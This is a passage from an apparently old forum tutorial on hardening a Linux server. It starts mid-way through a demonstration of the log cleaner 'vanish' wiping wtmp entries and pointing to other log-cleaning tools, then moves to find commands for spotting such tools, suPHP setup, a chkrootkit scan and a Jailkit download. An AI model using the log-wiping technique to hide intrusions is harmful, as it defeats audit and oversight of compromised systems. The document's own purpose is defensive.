katalogen finns inte mv: kan inte ta status p?? "httpda.hm": Filen eller katalogen finns inte mv: kan inte ta status p?? "httpde.hm": Filen eller katalogen finns inte V_A_N_I_S_H_E_D_! Your tracks have been removed Exiting programm !! mywisdom@d3v1l~#w 05:18:42 up 128 days, 18:22, 0 users, load average: 1,15, 1,02, 1,00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT mywisdom@d3v1l~# [/code] see differences ??? attacker can edit wtmp to make him dissapear from the system from commands like : w or who Ok here we may see some log cleaners that intruder oftenly uses: http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=log+cleaner&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0 try to find them though actually isn't so wise as attacker may already rename the file: [code] find / -name 'vanish' find / -name 'wzap' find / -name 'szapper' find / -name 'vanish.c' find / -name 'wzap.c' find / -name 'szapper.c' and so on ................. [/code] [b]Installing su php [/b] With SUPHP, the file permissions can then be set so that only the user can read the file, and the SUPHP page can write in any location where the owner can write. So using this each php runs won have stupid id like nobody or apache or other generals httpd id :-p, the privilege can be separated using this su php. for manual installation u may see this: http://www.suphp.org/DocumentationView.html?file=INSTALL [b]Root Kit checking using chkrootkit[/b] Here we go: [code] mywisdom@devilzc0der~#wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.g --10:05:35-- ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz => `chkrootkit.tar.gz' Resolving ftp.pangeia.com.br... 200.155.17.114 Connecting to ftp.pangeia.com.br|200.155.17.114|:21... connected. Logging in as anonymous ... Logged in! ==> SYST ... done. ==> PWD ... done. ==> TYPE I ... done. ==> CWD /pub/seg/pac ... done. ==> PASV ... done. ==> RETR chkrootkit.tar.gz ... done. Length: 39,421 (38K) (unauthoritative) 100%[=================================================================>] 39,421 16.79K/s 10:05:45 (16.76 KB/s) - `chkrootkit.tar.gz' saved [39421] mywisdom@devilzc0der~#tar zxvf chkrootkit.tar.gz chkrootkit-0.49 chkrootkit-0.49/chkrootkit.lsm chkrootkit-0.49/README.chkwtmp chkrootkit-0.49/COPYRIGHT chkrootkit-0.49/Makefile chkrootkit-0.49/chkutmp.c chkrootkit-0.49/ifpromisc.c chkrootkit-0.49/chkrootkit chkrootkit-0.49/ACKNOWLEDGMENTS chkrootkit-0.49/check_wtmpx.c chkrootkit-0.49/chkdirs.c chkrootkit-0.49/README.chklastlog chkrootkit-0.49/chklastlog.c chkrootkit-0.49/strings.c chkrootkit-0.49/README chkrootkit-0.49/chkproc.c chkrootkit-0.49/chkwtmp.c mywisdom@devilzc0der~#cd chkrootkit-0.49 mywisdom@devilzc0der~#make *** stopping make sense *** make[1]: Entering directory `/root/suphp-0.7.1/chkrootkit-0.49' gcc -DHAVE_LASTLOG_H -o chklastlog chklastlog.c gcc -DHAVE_LASTLOG_H -o chkwtmp chkwtmp.c chkwtmp.c: In function 'main': chkwtmp.c:95: warning: incompatible implicit declaration of built-in function 'exit' gcc -DHAVE_LASTLOG_H -D_FILE_OFFSET_BITS=64 -o ifpromisc ifpromisc.c gcc -o chkproc chkproc.c gcc -o chkdirs chkdirs.c gcc -o check_wtmpx check_wtmpx.c gcc -static -o strings-static strings.c gcc -o chkutmp chkutmp.c make[1]: Leaving directory `/root/suphp-0.7.1/chkrootkit-0.49' [/code] Ok let's test whether we have infected elf binary or not: [code] mywisdom@devilzc0der~#chkrootkit ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `crontab'... not infected Checking `date'... not infected Checking `du'... not infected Checking `dirname'... not infected Checking `echo'... not infected Checking `egrep'... not infected Checking `env'... not infected Checking `find'... not infected Checking `fingerd'... not found Checking `gpm'... not infected Checking `grep'... not infected Checking `hdparm'... not infected Checking `su'... not infected Checking `ifconfig'... not infected Checking `inetd'... not tested Checking `inetdconf'... not found Checking `identd'... not found Checking `init'... not infected Checking `killall'... not infected Checking `ldsopreload'... can't exec ./strings-static, not tested Checking `login'... -------and so on----------------- [/code] [b]Installing Jailkit for jailing jailing our intruder ;-p (bruakakakaka :)) [/b] Jailkit is a set of utilities to limit user accounts to specific files using chroot() and or specific commands. Setting up a chroot shell, a shell limited to some specific command, or a daemon inside a chroot jail is a lot easier and can be automated using these utilities. Jailkit is known to be used in network security appliances from several leading IT security firms, internet servers from several large enterprise organizations, internet servers from internet service providers, as well as many smaller companies and private users that need to secure cvs, sftp, shell or daemon processes. [code] mywisdom@devilzc0der~#wget http://olivier.sessink.nl/jailkit/jailkit-2.11.tar.gz --10:13:12-- http://olivier.sessink.nl/jailkit/jailkit-2.11.tar.gz => `jailkit-2.11.tar.gz' Resolving olivier.sessink.nl... 137.224.32.205 Connecting to olivier.sessink.nl|137.224.32.205|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 132,196 (129K) [application/x-tar] 100%[=================================================================>] 132,196 29.2